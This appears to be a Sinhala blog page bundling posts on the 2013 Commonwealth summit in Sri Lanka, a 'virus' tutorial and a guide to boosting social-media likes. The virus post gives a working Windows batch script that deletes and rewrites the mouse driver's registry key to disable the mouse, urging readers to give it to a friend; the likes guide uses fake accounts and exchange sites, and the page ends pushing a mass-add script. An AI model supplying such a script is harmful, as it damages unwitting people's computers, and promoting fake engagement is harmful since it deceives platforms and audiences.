මෙතුමා ඉපදුණේ 1941- 09- 31 වැනිදාය. 
1965 - 2001 දක්වා මෙතුමා ඉන්දියා විදේශ සේවයේ සේවය කළේය. නවදිල්ලි හා කේම්බ්‍රිජ් විද්‍යාර්ථියෙකි.



* ශ්‍රී ලාංකා පොදු රාජ්‍ය මණ්ඩල සමුළුවේ සභාපති , ශ්‍රී ලාංකාවේ ජනපති මහින්ද රාජපක්ෂ මහතා.





* මේ තියේන්නේ ශ්‍රී ලාංකා පොදු රාජ්‍ය මණ්ඩල සමුළුවේ නිල ගිතයයි.
# මේ පොදු රාජ්‍ය මණ්ඩල සමුළුව තියන්නේ අවුරුදු 2න් , 2කට.
ඒ අනුව , මේ 2013 නිසා ඊලග පොදු රාජ්‍ය මණ්ඩල සමුළුව තියේන්නේ 2015 දියි.
නමුත් , මිට අවුරුදු 2කට කලින් 2011 ඔක්තෝබර් මාසයේදි , මේ පොදු රාජ්‍ය මණ්ඩල සමුළුව ඕස්ට්‍රේලියාවේ , පර්ත් ( Perth ) නගරයේදි පැවත් වුනා.

* මේ තියේන්නේ ඕස්ට්‍රේලියා පොදු රාජ්‍ය මණ්ඩල සමුළුව සදහා නිර්මාණය කරපු නිල ලාංඡනය.



* මේ තියේන්නේ ඕස්ට්‍රේලියා පොදු රාජ්‍ය මණ්ඩල සමුළුව සදහා නිර්මාණය කරපු නිල වෙබ් සයිට් එක 

www.CHOGM2011.org

* ඕස්ට්‍රේලියා පොදු රාජ්‍ය මණ්ඩල සමුළුවේ සභාපති , 20011 දි හිටපු ඕස්ට්‍රේලියා අග්‍රාමාත්‍ය ජුලියා ගිලඩ් මහත්මියයි.




* මේ තියේන්නේ ඕස්ට්‍රේලියා පොදු රාජ්‍ය මණ්ඩල සමුළුව සදහා නිර්මාණය කරපු නිල කාසි.




* මේ තියේන්නේ ඕස්ට්‍රේලියා පොදු රාජ්‍ය මණ්ඩල සමුළුව සදහා නිර්මාණය කරපු නිල මුද්දර.




* මේ තියේන්නේ 2011 දි , ඕස්ට්‍රේලියාවේ පැවති පොදු රාජ්‍ය මණ්ඩල සමුළුවට අදාල බැනර් එකක්.





* චාල්ස් කුමරු ගැන තවත් විස්තර හා ජායාරුප මෙතනින් ගිහින් බලන්න.

* ශ්‍රී ලාංකා පොදු රාජ්‍ය මණ්ඩල සමුළුව - 2013 ගැන තවත් විස්තර හා ජායාරුප මෙතනින් ගිහින් බලන්න.

* අපේ රටට ආවත් , තවමත් එංගලන්තයේ වත්මන් අගමැති ඩේවිඩ් කැමරන් , අපේ රටට කොයි මොහතේ හරි , මොනව හරි විධියක ගේමක් දෙන්න තමයි බලන්න ඉන්නේ. මොකද තාමත් එංගලන්ත අගමැති අපේ රටේ තිබුන යුද්ධය සම්භන්ධව ජාත්‍යන්තර පරික්ෂණයක් කරන්න ඉඩ දෙන්න කියලයි , ඊයේ පැවති මාධ්‍යය සාකච්චා වලදි නොකියා කිව්වේ.

* අපිට මොනව හරි ගේමක් දෙන්න බලන්න ඉන්න අනිත් රටවල් 2ක තමයි කැනඩාව හා මුරුසි දිවයින.

මම හිතනව , ඔයාලත් දකින්න ඇති , 2013 නොවැම්බර් 16 වෙනිදා මුරුසි ජනපති Channel 4 සගම තිබ්බ සාකච්චාවකදි , අපේ රටේ තිබුන යුද්ධය සම්භන්ධව ජාත්‍යන්තර පරික්ෂණයක් කරන්න ඉඩ නොදුන්නෝත් , අපේ රටේ පොදු රාජ්‍ය මණ්ඩලිය සාමාජිකත්වය අහෝසි කල යුතු බවට කිව්වා. ඒ වගේම තව ගොඩක් දේවල් , මේ සාකච්චාවේදි කතා වුනා.
මේ මිනිස්සුන්ට තියේන්නේ මහ පුදුම ආශාවන්. හිතා ගන්නත් බැ.

* ඒ වගේම CNN නාලිකාවත් , අපේ රටේ තිබුන යුද්ධය ගැන ජාත්‍යන්තර පරික්ෂණයක් පිළිබදව , වත්මන් ශ්‍රී ලාංකානු - එංගලන්ත මහ කොමසාරිස්වරයාගේන් විමසා සිටියා.
එහිදිති CNN එකට ගොඩාක් හොද පිළිතුරක් , අපේ ශ්‍රී ලාංකා මහ කොමසාරිස්වරයාගේන් ලැබුනා.

* මේ තරම් විශාල මුදලක් වියදම් කරල තිබ්බ පොදු රාජ්‍ය මණ්ඩල සමුළුවේන් අපට ලැබේන දේවල් ගැන අද ( 2013/11/17 ) සමුළුව අවසන් විමේන් පසුව , අපේ ජනාධිපතිතුමා කිව්වා.
ඒ කිව්ව දේවල් ඒ විධියටම ලැබේනව නම් අපේ රට ඉදිරියේදි ලොකයේ දියුණුම රටවල් අතරට ලේසියේන්ම එකතු වෙන්න පුලුවන්.
අපි බලමු , ඒ දේවල් කිව්ව විධියටමද , එහම නැත්නම් කිව්ව දේවල් සංස්කරණය කර කර කරාවිද කියලා.


* කොහම වුනත් , අපේ මේ ශ්‍රී ලාංකාවට , ඉදිරි අවුරුදු 2 , 3 ඇතුලත ලෝකයේ දියුණුම රටවල් අතරට එකතු වෙන්න පුලුවන් නම් ඇත්තටම එක අති විශිෂ්ටයි.

* මොනව වුනත් අපේ රටට , විශේෂිය රටවල් 54ක නියෝජිතයෝ ඇවිත් , අපේ රටේ තාක්ෂණය ගැන ( වාරි , පරිගණක ආදි ) , සොබා දහම ගැන , ලික ජනතාව ගැන , කාලගුණය ගැන ආදි බොහෝ දේවල් ගැන දැන ගන්න ඇති.
මේ කිව්ව දේවල් ගැන දැන ගත්තාම , අපේ රට ගැන කලින් හිතන් හිතපු විධියවල් නැති වෙල , වෙනස් වෙලා අපේ රට ගැන අලුත් ආකල්ප හිතේන්න ඇති.
අන්න , ඒ අලුත් ආකල්ප අපට වටිනවා.

* මේ , අපේ ශ්‍රී ලාංකාවේ පැවත් වෙන පොදු රාජ්‍ය මණ්ඩල සමුළුව ගැන ඔබට හිතේන දේවල් හා මෙම සමුළුව මගින් ශ්‍රී ලාංකාවට ලැබිය හැකි යහපත් ප්‍රතිපල ගැන ද , අනිවාරේන්ම කියන්න.

4 Comments:

Virus එකක් හදමු , Mouse එක Disable කරන්න. [ How To Create a Virus To Disable a Mouse. ]





ඔන්න කොහොමහරි පොඩි Post එකක් හොයගෙන ආවා. මේ Post එකෙ පොඩි ආතල් එකක් තියෙනව.ඒක තමයි මේකෙන් හදන Virus එකෙන් මව්ස් එක Disable කරන්න පුලුවන්.මේක යාලුවෙකුට දීලා බලන්න.
එහෙනම් මෙහෙම කරන්න.







1. ) මුලින්ම Note Pad එකක් Open කරලා පල්ලෙහා තියෙන කොඩෙ එක ගහන්න.

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
 rem --------------------------------- 

2. ) දැන් මේක virus.bat කියල Save කරන්න. වැඩිය හොඳයි Desktop එකේ දානවනම්.


එහෙනම් වැඩේ හරි කරල බලලා comment එකකුත් දානන්කො.
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem --------------------------------- - See more at: http://www.coolhackingtrick.com/2012/01/make-virus-that-disable-mouse.html#sthash.R2fFwytJ.dpuf
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem --------------------------------- - See more at: http://www.coolhackingtrick.com/2012/01/make-virus-that-disable-mouse.html#sthash.R2fFwytJ.dpuf

3 Comments:

Facebook , Twitter , Vk හා YouTube වල Likes , Comments , Views , Subscribes හා Followers ගාන ඇතුලුව තවත් බොහෝ දේ , බලන් ඉදිද්දි වැඩි කරගන්නේ මෙහමයි. [ How To Increase Facebook , Twitter , Vk & YouTube Likes , Comments , Views , Subscribes & Followers. ]


හැමදාම පොස්ට් එකක් දාන්න හිටියට , වෙලාවක් ලැබුනේම නැ. :D

මේ සිකුරාදා , සෙනසුරාදා හා ඉරිදා අපට විශේෂ දවසක්. මොකද මේ සිකුරාදා ( 2013.11/08 ) අපේ වාර්ෂික රග්බි තරගය ගාල්ල , රිච්මන්ඩ් විදුහල එක්ක තිබුනා. ඒකේන් , අපේ , ගාල්ල , ශාන්ත ඇලවිෂියස් විදුහල ලකුණු 56 ක්ද , රිච්මන්ඩ් විදුහල ලකුණු 6 ක්ද ලෙස අපි අතිවිශිෂ්ට ජයග්‍රහනයක් ලබා ගත්තා.
ඒ වගේම මේ සෙනසුරාදා ( 2013/11/09 ) අපේ වාර්ෂික බාස්කට් බෝල් තරගය ගාල්ල , මහින්ද විදුහල එක්ක තිබුනා. ඒ තරගේනුත් , අපේ ගාල්ල , ශාන්ත ඇලවිෂියස් විදුහල ජයග්‍රහනය කරා.
ඒ නිසා , අනිවාරේන්ම , අපේ රග්බි හා බාස්කට් බෝල් කණ්ඩායම් 2ටම සුභ පතන ගමන් , මේ පොස්ට් එක කියවන්න පටන් ගමු. :D

ආ , අද ( 2013/11/10 ) අපේ හික්කඩුවේ හා ගාල්ලේ CHOGM - Sri Lanka සමුළුවත් පටන් ගන්නවා. හික්කඩුවේ නම් සතියක්ම සමුලුව හා CHOGM - Sri Lanka සතියත් තියේනවා.
ගාල්ලේ දින ගැන නම් හරියටම කියන්න දන්නේ නැ.
CHOGM - Sri Lanka සමුළුවටත් සුභ පතන ගමන් , මේ පොස්ට් එක කියවන්න පටන් ගමු.

අද වන විට ගොඩාක් දෙනෙක්ට Facebook , Twitter , Vk ( Vikontakte ) , YouTube වගේ සයිට් වල Account තියේනවා.
ඒ අනුව , Facebook එකේ Page වලට Likes , Comments ද , YouTube එකේ Videos වලට Views , Likes , Comment ද , Twitter , Account වලට Followersලද යනාදි ඒවා ගොඩාක් තියේනවා නම් හැමෝම කැමතියි.
ඉතින් Facebook , Twitter , Vk හා YouTube වල Likes , Comments , Views හා Followers ගාන බලන් ඉදිද්දිම වැඩි කරගන්න පුලුවන් ලේසි ක්‍රමයක් තමයි , දැන් අපි කියන්නේ.

අපේ Facebook , Twitter , Vk හා YouTube වල Likes , Comments , Views හා Followers ගාන වැඩි කරගන්න , අපිට එක්තරා සයිට් කිපයක් යොදා ගන්න පුලුවන්.
මේ සයිට් වලට කියන්නේ Social Exchange සයිට් කියලයි. ඒ මොකද මේ සයිට් වලින් අපට ඕන කරන Likes , Comments , Views , Followers වගේ දේවල් ලබා ගන්න පුලුවන් නිසයි.

මේ වගේ හොද , ප්‍රධාන සයිට් දැනට 3ක් තියේනවා.

1. ) Add Me Fast. ( දැනට ලොකේ වැඩි ප්‍රමාණයක් භාවිතා කරයි. )
2. ) Like 4 Like. ( මේකත් , දැනට ලොකේ වැඩි ප්‍රමාණයක් භාවිතා කරයි. )
3. ) Click 4 Fans. ( මේක අපේ ලංකාවේ සයිට් එකක්. )

අපි , මේ සයිට් 3න් , Add Me Fast කියන සයිට් එක භාවිතා කරලා , ඔබේ Likes , Comments , Views , Followers ගාන බලන් ඉදිද්දිම වැඩි කරගන්නේ කොහමද බලමු.

* හරි , අපි මේ සයිට් එක භාවිතා කරන්න කලින් මේ සයිට් එකේන් අපට Likes , Comments , Views , Followers වගේ දේවල් ලැබෙන හැටි බලමු.

මේ Add Me Fast සයිට් එකේ ගිණුමක් හදාගෙන සයිට් එකට ගියාට පස්සේ අපටත් තියේනවා තව අනිත් අයගේ Facebook Page වලට Like හා Comment කරන්න , YouTube , Video බලන්න , අනිත් අයගේ Twitt ඔයාගේ Twitter ගිණුමේ දන්න වගේ ගොඩක් දේවල් කරන්න පුලුවන්.
ඒ වගේ වැඩ කරනවට , අපට ඒ ඒ වැඩේට අදාලව තියේන Points ගානක් ලැබෙනවා.
අන්න , ඒ Points භාවිතා කරල , අපටත් පුලුවන් , අපට ඕන Likes , Comments , Views , Followers වගේ දේවල් ලබා ගන්න.

* මේ පහලින් කියල තියේන පියවරවල් වලට අනුව , ඔයාගේ වැඩේ කරගන්න.

1. ) මුලින්ම , ඔයාට , ඔයාගේ ඇත්ත තොරතුරුම නැති , ඒ Likes , Comments , Views , Followers වගේ දේවල් ගන්න ඕන දේවල් වලට කිසිම අදාලත්වයක් නැති , වෙන අලුත් ගිණුමක් ඕන.
මොකද , අර උඩින් කියල තියේනව වගේ අපිත් , අනිත් අයගේ ඒවට Likes , Comments , Views , Followers වගේ ඒවා දාල , Point ගන්න තරමට තමයි , අපටත් Likes , Comments , Views , Followers වගේ දේවල් ගන්න පුලුවන් වෙන්නේ.
ඒ නිසා , අනිවාරේන්ම , අලුත් Facebook , Twitter , Vk හදා ගන්න. ( YouTube ගිණුමක් නම් අලුතේන් හදන්න ඕන නැ. )

2. ) දැන් , අපි මුලින්ම මේ Add Me Fast සයිට් එකේ මෙතනින් ගිහින් ගිණුමක් හදා ගන්න. 
අලුතේන් Add Me Fast සයිට් එකේ ගිණුමක් හදන්න , දකුණු පැත්තේ තියේන Try For Free කියන Button එක ක්ලික් කරන්න. ( සාමන්‍ය ගිණුමක් හදන විධියටම හදා ගන්න. )
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]




3. ) දැන් , අපි Add Me Fast සයිට් එකේ Register වෙලයි ඉන්නේ.
සමහර වෙලාවට මේ සයිට් එකේන් , අපි ලබා දුන් Email එකට Confirmation Email එකක් එවනවා. ඒක Confirm කරාට පස්සේ තමයි , අපට හරියටම මේ සයිට් එකේන් වැඩ කරගන්න පුලුවන් වෙන්නේ. 

4. ) දැන් , දකුණු පැත්තේ ලිස්ට් එකේ මුලින්ම තියේන Add Site/Page කියන එක ක්ලික් කරන්න.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]




5. ) දැන් , පොඩි Form එකක් එවි පුරවන්න.

* එකේ , මුලින්ම තියේන Type කියන එකේන් , ඔබට ලබා ගැනිමට ඕන දේ තෝරන්න. ( Facebook , Likes ඕන නම් Facebook Likes කියන එක තෝරන්න. )
* Countries කියන එකේ Worldwide එකට Tic එකක් දාල තියන්න.
* Tittle කියන එකට , ඔබේ කාරයට අනුව හොද නමක් දෙන්න.
* Site/Page URL කියන එකට , ඔබට Likes , Comments , Views , Followers ගන්න ඕන Facebook Page එකේ හෝ Facebook පින්තුරයේ හෝ YouTube Video හෝ Twitter ගිණුමේ හෝ එකට අදාල Link ( URL ) එක හරියටම දෙන්න.
* Total Clicks හා Daily Clicks කියන ඒවට මුකුත්ම කරන්න එපා.
* CPC කියන්නේ , අපේ මේ දේට Like , Comment , Views , Follower වගේ දේවල් කරන අනිත් අයට ලැබේන Points ගානයි. ( එකට 4ක් හෝ 5ක් දෙන්න. ඒක ගොඩාක් හොදයි. )
* දැන් , මේ සියල්ලම හරියට කරා නම් Save Changes කියන එක ක්ලික් කරන්න.

[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



6. ) තාමත් අපේ ගිණුමේ හරියට Points නැ. ඒක නිසා අපි Points එකතු කරගන්න ඕන.
ඒත් , ඒකට කලින් අපි තව වැඩක් කරන්න ඕන.

ඒකට , ඔය දකුණු පැත්තේ ලිස්ට් එකේ , 2යට තියේන My Sites කියන එක ක්ලික් කරන්න.
දැන් , අපි අර කලින් විස්තර දිලා හදා ගත්තු එක දකින්න පුලුවන්.
අන්න , ඒකේ වම් පැත්තට වෙන්න Pause Button එකක් තියේනව. අන්න , ඒ Pause Button එක ක්ලික් කරන්න. ( මෙහම කරාම අපට හොද Points ගානක් හොයා ගෙන , ඊට පස්සේ වැඩේ සුපිරියටම කරගන්න පුලුවන්. )
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



7. ) දැන් , අපි , අපේ ගිණුමට Points ගන්න ඕන.

ඒකට , වම් පැත්තේ ලිස්ට් එකේ 4ට තියේන Free Points කියන එක ක්ලික් කරන්න.

දැන් , ඉතින් , ඕඅ එන පේජ් එකේ තියේන දේවල් වලින් තමන් කැමති එකක් තෝරන් , ඒ කියල තියේන දේ කරන්න. ඒ දේ කරාට පස්සේ , ඒකට අදාල Points ගාන ඔයාට ලැබෙනවා.

[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



* අපි හිතමු , ඔයා ඒ පේජේ එකේන් , මුලින්ම තියේන Facebook Likes කියන එක තෝර ගත්ත කියලා.

# ඒ Facebook Likes කියන එක ක්ලික් කරාට පස්සේ තව අලුත් පේජ් එකක් එවි.

# අපි ඒ Page එකට Like කරෝත් , අපට ලැබේන Points ගාන " You will get 6 points for Liking " ලෙස කියල තියේනවා.

# ඒ වගේම අපේ Points වල එකතුව , දකුණු පැත්තේ , උඩින්ම පෙන්වනවා.

# ඒ පේජ් එකේ මැද හරියේ Like කියල එකක් තියේනව. අන්න , ඒ Like කියන එක ක්ලික් කරන්න.
දැන් , අලුත් Window එකකින් ඒ Page එක Open වෙවි. ඊට පස්සේ අනිවාරේන්ම තත්පර 3ක් හෝ 4ක් ඉදලා , ඒ Page එකට Like කරන්න. ඊට පස්සේත් තව තත්පර 2ක් හෝ 3ක් විතර ඉන්න. මෙහම ඉන්නකොට Autoම ඒ Window එක Close වෙන්නත් පුලුවන්. ඒහම Close නොවුනෝත් , ඔයාම ඒ Window එක Close කරන්න.

# දැන් , ඉක්මණටම දකුණු පැත්තේ , උඩම , අපේ Points ගාන පෙන්වන තැන බලන්න , ඒ Points ගාන අපට ලැබිලද කියල. ඒක ලැබිල නම් අපි වැඩේ හරියටම කරල. Points ලැබිල නැත් නම් , අපේ අතින් මොකක් හරි වැරද්දක් වෙලා. එකට නම් ඉතින් මුකුත් කරන්න දෙයක් නැ.

අපේ ගිණුමට Points 500ක් හෝ 100ක් වගේ ලැබේනකම් , මේ වගේ එක එක වැඩ කරන්න වෙනවා.

ඒ වගේම එක්තරා Script එකක් භාවිතා කරල අපේ Points ගාන වැඩි කරගන්නත් පුලුවන්. ඒ ගැන දැන ගන්න මෙතනින් යන්න.

* අපි දැන් , අර එක එක වැඩ කරල Points 500ක් හෝ 1000ක් විතර ලබා ගත්තට පස්සේ , ආපහු අර වම් පැත්තේ ලිස්ට් එකේ 2යට තියේන My Sites කියන එකට යන්න.
දැන් , අපි අර කලින් Pause කරල තිබුන එක , දැන් ආපහු Play Button එක ක්ලික් කරල , එක ක්‍රියාත්මක කරන්න.

ඊට පස්සේ ආපහු තව Page 3 , 4කට Like ටිකක් දාන්න. එතකොට ඔයාගේ Page එකේ Like ගාන පට පට ගාල වැඩි වෙවි.

* ඒ වගේම අපි දවසකට , අනිත් අයගේ දේවල් වලට Like , Comment , Views , Follower වගේ ඒවා , 20ක් කරාම , අමතර Bonus එකක් විධියටත් තව Points 150ක් ලබා ගන්න පුලුවන්.
ඒ Points 150 ලබා ගන්න , වම් පැත්තේ ලිස්ට් එකේ , 3ට තියේන Daily Bonus කියන එක ක්ලික් කරාම එන Page එකේ මැද හරියේ තියේන Get Bonus කියන එක ක්ලික් කරන්න.

* මම මේ කිව්වේ Facebbok Page එකකට Like ගන්න විධියයි.
ඉතින් , මේ කිව්ව විධියට Facebook , Twitter , Vk හා YouTube වල Likes , Comments , Views හා Followers ගාන බලන් ඉදිද්දි වැඩි කරගන්න පුලුවන්.


* ඔයාට , ඔයාගේ දේට අදාලව ලබා දුන්න CPC එක හෝ එකේ නම ආදිය වෙනස් කරන්න ඕන නම් වම් පැත්තේ ලිස්ට් එකේ , 2යට තියේන My Sites කියන එක ක්ලික් කරන්න.

ඊට පස්සේ එන පිටුවේ මැද හරියේ , වම් පැත්තට වෙන්න , ඇණයක් වගේ Settings සලකුණක් තියේනවා. අන්න , ඒක ක්ලික් කරල , අවශ්‍ය වෙනස්කම් කරගෙන , ඊට පස්සේ ඒක Save කරන්න. 
( සමහර වෙලාවට වෙනස්කම් කරල Save කරද්දි , ඒක Save වෙන්න තත්පර 20කට වැඩි වෙලාවක් යනව නම් , ආපහු සැරයක් , අර වම් පැත්තේ , 2යට තියේන My Sites කියන එක ක්ලික් කරන්න. එවිට ඔබ කරපු වෙනස්කම් සිදු වි ඇති බවට බලා ගන්න පුලුවන්. )

* ඒ වගේම , ඒ Settings සලකුණින් පසුව තියේන කතිර සලකුණ මගින් , ඔබට අවශ්‍ය නම් ඒවා Delete කිරිමට හැක.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



ඒ වගේම මේ සයිට් එකේ තියේන අනිත් දේවල් ගැන බම අත්හදා බලලා , ඒවා ගැන දැන ගන්න.

හරි , මේ පොස්ට් එකේන් ඔයාලට ප්‍රයෝජනයක් වුනා නම් අනිවාරේන්ම Comment එකක් දාන්න.

----------------------------------------------------------------------------------------------------------------------------------


අපිට , මේ පොස්ට් එක කියවන ඔයාලගේන් ගොඩාක් ලොකු උදව්වක් ඕන.
ඒ තමයි , අපේ Seven Net සයිට් එකේ Facebook Group එකට ඔයාලගේ සියලුම යාලුවන් ඇඩ් කරන්න.

දැනට , අපේ Facebook Group එකේ සාමාජිකයන් 4710ක් සිටිනවා. ඉතින් , ඔයාලා මේ පොස්ට් එක බැලුවට පස්සේ මේ ගාන තවත් වැඩි වෙවි කියල අපි හිතනවා.

එක පාරින් ඔයාගේ සියලුම යාලුවන් , අපේ Facebook Group එකට ඇඩ් කරන්න වෙන Script එක මෙතනින් ලබා ගන්න.

ඒ Script එක භාවිතයේන් , අපේ Group එකට යාලුවෝ ඇඩ් කරන විධිය දන්නේ නැත්නම් , ඒක කරන විධිය මෙතනින් ගිහින් බලන්න.

මෙන්න , ඔයාගේ සියලුම යාලුවන් ඇඩ් කරන්න ඕන , අපේ Facebook Group එක - https://www.facebook.com/groups/BestPcGamesAndSoftwares

අපි හිතනවා , ඔයාලා අනිවාරේන්ම , අපිට මේ උදව්ව කරල දෙයි කියලා.

Ref_banner 928x90

15 Comments:

Tweet Now !!